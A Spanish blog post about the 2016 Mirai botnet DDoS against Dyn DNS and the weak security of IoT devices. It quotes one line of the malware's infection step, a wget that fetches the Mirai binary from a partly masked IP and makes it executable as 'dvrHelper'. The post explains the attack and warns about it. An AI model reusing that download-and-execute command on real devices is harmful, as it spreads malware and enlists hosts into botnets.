DDoS y el buen “Ups”….

botnet

Internet…. es mundo bonito y mágico que todo lo puede y todo lo da, al cual, ya damos por sentado que estará ahí disponible, para nosotros los mortales usuarios, siempre, confiable, estable, activo, ¿Porque no seria así?, hay todo un grupo de ingenieros, técnicos, doctores, todos especialistas siempre listos y siempre despiertos para evitar cualquier desastre….. ¿No?, pues no. Los Ups, tambien existen.

El viernes 21 de Octubre del 2016, un ataque simple pero coordinado exploto una vulnerabilidad con los IoT que se lleva básicamente meses diciendo “gente… algo feo se avecina”… y sucedió, así de simple. En el ataque múltiples servicios se vieron afectados, como fueron Twitter, Whatsapp, Netflix, Cnn, Spotify, Xbox, Payla, Play Station network, etc. etc. etc.

Tanto es así, que el especialista de seguridad, Bruce Schneier, publico un articulo con fecha 13/09/16 titulado “Alguien esta aprendiendo como tumbar Internet“.

 

Ahora, ¿que rayos sucedió?, según se conoce ahora, se orquesto un ataque dirigido y controlado utilizando las bondades de unos DVR, se especula que son todos de la marca china “Dahua” el principal vendedor del mundo de dispositivos de vigilancia, donde a través de sus pobres medidas de seguridad se convirtieron en una de las mayores Botnet conocidas recientemente pudiendo convertirse básicamente en una horda zombi al mejor estilo de Walking Dead, cuyo única misión fue atacar al proveedor de servicios de DNS “DyN“.

Y les comento que…. lo logro. ¿Como funciona?….

22internet1_xp-master675-u10107421996mbd-510x286abcEn este caso, un malware llamado “Linux Mirai” fue la mente criminal. Lo interesante de el, no es nuevo. En las olimpiadas de Rio De Janeiro se detecto que precisamente unos DVR estaban funcionando raro, realizando peticiones de tipo TELNET hacia sitios específicos, nada muy grave ya que solo eran pocas cámaras, pero… raro al fin. los inspectores de seguridad del evento decidieron explorar el tema y descubrieron un HoneyPot que, tenia en forma automatizada la ejecución del protocolo desde un origen chino (59.69.xx.xx), lo interesante es, al mejor estilo de película conspiratoria de Hollywood, el tema no fue catalogado como grave ni incluida en ninguna Blacklist.

El malware descarga desde la dirección IP fantasma de Ucrania, una linea de código que se ejecuta en los DVR con elevación de privilegios, ya que, como comentaba la seguridad de los dispositivos es pobres y las credenciales son únicas para todos, la misma reza:

wget http://5.206.X.X:80/bins/mirai.x86 -O – > dvrHelper; /bin/busybox
chmod 777 dvrHelper;

Por supuesto, esta dirección IP tampoco estaba incluida en ningún Blacklist, aumentando el desastre, ademas, se observa que el paquete tenia como intensión convertirse en el “dvrHelper”, certificando que el ataque no fue algo azaroso, sino dirigido específicamente a estos dispositivos.

Ahora aquí viene el tema realmente “bestial”. El malware explora el dispositivo IoT infectado, explora si tiene comunicación a través de ICMP hacia IP convalidándose contra una IP establecida de forma Hardcore que pertenece a una empresa de telecomunicaciones Sur Coreana (CJ HelloVision), comienza a través del protocolo TELNET infectar a otros dispositivos semejantes con las mismas características de seguridad, para armar su horda Botnet…

Pues bien, mientras todo esto pasaba, solo un grupo esta “pendiente del rollo”, se intento subirlo a VirusTotal para alertar al mundo (Actualmente aun solo tres antivirus lo detectan como malware), alguien…. aun no se tiene autoria, decidió unir todo.

sorry-no-internet-500x270Unió la información del Sr. Schneier, unió el conocimiento que se tenia del Malware, unió el conocimiento de los dispositivos que se tenían infectados y su forma de trabajar levantando simples sesiones TELNET y decidió darle un uso, la dirección IP a quien iría dirigido todas esas peticiones en forma unisona, Dyn, nada mas que uno de los proveedores de DNS mas grande de EEUU. Y, que paso, pues para abajo todo el mundo…. la empresa no pudo contener el ataque, solo informar y empezar a trabajar en tratar de levantar un buen muro de defensa… mientras, todos fritos y sin servicio.

Se estima que solo se usaron el 10% de los dispositivos posibles infectados en el mundo y aun así, fue mas que suficiente para que todas las medidas de seguridad y control de la empresa de servicios de DNS de grandes tecnológicos sufriera perdida…. cabe la pregunta, ¿que pasaría si se usara el otro 90%?….

Algo oscuro se avecina…. mucho se ha hablado de las deficiencias y peligros de seguir toasterincorporando dispositivos al mundo IoT sin la debida capacidades de seguridad, y por fin ahora se esta empezando a notar el hilo roto y asustarse todo el mundo… Neveras que te monitorean tus consumos para predecir tus necesidades y conectarse remotamente a través de la web del supermercado para “comprar” lo que ellas saben que necesitas, tostadoras de pan que suben a la nube tus consumos de “pan” para decirte las calorías consumidas, ositos de peluche que aprenden del niño y juegan en forma dinámica y personalizada, todos mientras lo graban a través de una webcam incorporada que solo “los padres” pueden ver, en fin…. tecnología loca en cosas locas…

¿¿¿¿”Guerra avisada… que si esta matando al soldado”???

Según se sabe, alguien o algo, esta planificando un buen ataque, ya que, al no haber aun autor sobre este DDoS se estima que haya sido solo para “probar” que la idea funcione y ahora es que viene el verdadero… ¿mundo de las cavernas nuevamente?.

esperemos a ver.

el_fin_esta_cerca

Atte.

Ing. Alexi Stratthaus

Un pensamiento en “DDoS y el buen “Ups”….

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s